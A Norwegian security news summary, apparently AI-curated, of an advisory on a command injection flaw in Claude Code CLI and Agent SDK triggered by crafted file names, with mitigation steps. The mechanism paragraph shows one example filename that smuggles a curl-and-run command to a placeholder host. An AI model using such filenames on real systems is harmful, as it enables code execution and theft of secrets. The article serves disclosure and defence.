Hopp til hovedinnhold
PULSEN_
ESC Tilbake til strømmen
Fidelis Security · 26.4., 12:32 · sikkerhet

CVE-2026-35021: Kritisk OS Command Injection i Claude Code CLI og Agent SDK

SYNOPSIS_GENERERT

Filsti-håndtering er en klassisk angrepsflate, og Claude Code falt i fellen i versjoner opp til 2.1.91. CVE-2026-35021 lar filnavn med $() eller backticks kjøre vilkårlig kode med brukerens rettigheter.

Fidelis Security publiserte 25. april en analyse av CVE-2026-35021, en OS command injection-sårbarhet (CWE-78) som rammer Anthropics Claude Code CLI opp til og med versjon 2.1.91 og Claude Agent SDK for Python opp til og med 0.1.55. CVSS 4.0-vurderingen er høy: konfidensialitet, integritet og tilgjengelighet alle markert som «High», med lav angrepskompleksitet og ingen rettighetskrav. Anthropic har sluppet patcher for begge pakkene.

Mekanismen er læreboklik. Prompt-editor-prosessen i Claude Code bygger shell-kommandoer av filstier og kjører dem via execSync. Stien pakkes inn i doble anførselstegn, men POSIX-shell tolker fortsatt $(...) og backticks inne i slike strenger. Et filnavn som "$(curl evil.sh|sh)".txt blir dermed til kommandoeksekvering når CLI-en åpner filen i prompt-editoren.

«Application constructs shell commands using these file paths and executes them via functions like execSync without adequately neutralizing special characters.» — Fidelis Security, root cause-analyse

Angrepet krever brukerinteraksjon — noen må aktivt åpne den preparerte filen — så det er ikke wormable. Men terskelen er lav: en lenke til et repo, en utpakket zip eller en CI-jobb som kjører agenten på filer fra eksterne pull requests holder. Spesielt CI/CD-oppsett som kjører Claude Code mot innhold fra forks er eksponert, fordi runneren ofte har tilgang til hemmeligheter, deploy-nøkler og delt cache.

For deg som kjører Claude Code lokalt på en utviklerlaptop er risikoen lavere, men ikke null. Kombinert med en social engineering-vektor (et «sjekk dette repoet for meg»-prompt) er angrepet realistisk. Restriksjon av brukerrettigheter på CLI-kontoer og inputvalidering på filstier er Fidelis sine tilleggsanbefalinger, men den enkleste mitigationen er å oppdatere.

>_ NØKKELTALL
2.1.91
siste sårbare versjon av Claude Code CLI
0.1.55
siste sårbare versjon av Agent SDK for Python
CWE-78
OS command injection-klassifisering
CVSS 4.0 High
alle tre konfidensialitet, integritet og tilgjengelighet markert som «High»

Hva bør du gjøre?

  1. Kjør claude --version og oppgrader til siste versjon (npm i -g @anthropic-ai/claude-code eller pakkebehandleren du bruker). For Python-SDK: pip install -U claude-agent-sdk.
  2. I CI-pipelines som kjører Claude Code på pull request-innhold fra forks: pin versjonen eksplisitt i lockfilen, og vurder å kjøre runneren med begrensede rettigheter til hemmeligheter.
  3. Hvis du har kjørt sårbare versjoner mot ukjent innhold: sjekk shell-historikk og prosesslogger for uventede kommandoer fra Claude Code-prosessen, og roter eventuelle nøkler som lå tilgjengelig i miljøet.
Åpne eksternt kildedokument
sikkerhetclaude-codeAnthropic

KI-KURATERT — INNHOLD GENERERT AV KI-AGENTER BASERT PÅ ORIGINALKILDEN